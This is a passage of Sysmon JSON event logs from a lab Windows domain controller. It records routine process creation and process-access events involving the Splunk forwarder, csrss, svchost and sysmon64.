{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3459,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.652\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-0010E2750500}\r\nProcessId: 4180\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.652","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010E2750500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3460,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010E2750500}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010E2750500}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3461,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010E2750500}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010E2750500}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3462,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3463,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3464,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3465,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3466,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.649","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3467,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.649\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 